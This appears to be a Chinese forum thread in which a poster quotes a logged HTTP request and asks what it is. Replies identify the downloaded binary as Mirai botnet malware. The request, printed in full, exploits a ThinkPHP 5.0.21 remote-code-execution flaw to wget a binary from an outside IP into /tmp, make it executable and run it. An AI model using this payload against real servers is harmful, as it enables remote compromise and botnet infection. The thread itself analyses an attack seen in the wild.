http://5.182.210.129/bins/sora.x86 请不要点击执行。
"GET /thinkphp_5.0.21/?s=index/%5Cthink%5Capp/invokefunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=cd%20/tmp;
wget%20http://5.182.210.129/bins/sora.x86;
cat%20sora.x86%20%3E%20xdsf;
chmod%20777%20xdsf;
./xdsf%20
thinkphp HTTP/1.0",
这种是全网试么? 利用 thinkPhp 漏洞,远程执行代码?
问题来了,这个 exe sora.x86 里面究竟是什么?
|  |      1opengps      2021-09-27 20:15:31 +08:00 “请不要点击执行”一定会有人执行的 | 
|  |      2leloext      2021-09-27 20:53:47 +08:00 mirai 后门 | 
|  |      3crab      2021-09-27 21:20:22 +08:00 upx 壳 elf linux 上的? | 
|  |      4andy1ee11o2      2021-09-27 21:55:05 +08:00 Mirai Botnet | 
|      5urmyfaith OP 有人分析过? |